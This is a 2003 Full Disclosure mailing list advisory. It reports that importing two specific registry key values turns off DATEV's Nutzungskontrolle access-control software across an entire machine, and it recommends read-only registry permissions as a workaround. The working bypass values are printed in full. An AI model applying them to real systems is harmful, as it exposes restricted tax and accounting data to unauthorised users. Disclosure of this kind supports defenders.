Full Disclosure mailing list archives
DATEV Nutzungskontrolle Bypassing (REG)
From: <t4rku5 () hushmail com>
Date: Sat, 1 Nov 2003 05:29:52 -0800
Topic: DATEV Nutzungskontrolle Bypassing Release Date: 2003-10-30 Affected system: ================ - Nutzungskontrolle V.2.2 - Nutzungskontrolle V.2.1 Unaffected system: ================== - none known Summary: ======== DATEV eG is a German Company, which makes Software for tax advisors and lawyers. The Nutzungskontrolle (NUKO) is a Software to restrict the access for the users. For example, a normal user is not allowed to see the internal reward accounting data. These data are restrictet by the NUKO by, for example, blocking the "advisor number", which is used for all data in the internal reward accounting. Issue: ====== It is possible to deactivate the NUKO with just importing 2 registry keys: [HKEY_LOCAL_MACHINE\SOFTWARE\DATEV] "NukoInfo"=hex:00,00,00,00,00,00,00,00,e4,6c,d9,ce,f1,69,97,e7,61,eb, 08,48,e7,\ 71,65,9b [HKEY_LOCAL_MACHINE\SOFTWARE\DATEVeG\Components\B0000046\Versions\1.0\NukoInfos] "NukoInfo"=hex:00,00,00,00,00,00,00,00,e4,6c,d9,ce,f1,69,97,e7,61,eb, 08,48,e7,\ 71,65,9b If these 2 keys are importet, the NUKO is deactivated for the complete machine. So it is possible to see all data which are normaly restricted by the NUKO. The first 8 hex positions are freely choosable and dont have to be the same as in the second key. The next 16 positons have to be exactly as in the example. To activate the NUKO just import the following keys: [HKEY_LOCAL_MACHINE\SOFTWARE\DATEV] "NukoInfo"=hex:00,00,00,00,00,00,00,00,ee,37,8f,26,b2,e2,e6,ed,b7,ee, c0,1d,f4,\ 84,62,c4 [HKEY_LOCAL_MACHINE\SOFTWARE\DATEVeG\Components\B0000046\Versions\1.0\NukoInfos] "NukoInfo"=hex:00,00,00,00,00,00,00,00,ee,37,8f,26,b2,e2,e6,ed,b7,ee, c0,1d,f4,\ 84,62,c4 Workaround: =========== Give normal users "read only" access to this Registry keys. Credits: ======== Discovered by t4rku5 Concerned about your privacy? Follow this link to get FREE encrypted email: https://www.hushmail.com/?l=2 Free, ultra-private instant messaging with Hush Messenger https://www.hushmail.com/services.php?subloc=messenger&l=434 Promote security and make money with the Hushmail Affiliate Program: https://www.hushmail.com/about.php?subloc=affiliate&l=427 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- DATEV Nutzungskontrolle Bypassing (REG) t4rku5 (Nov 01)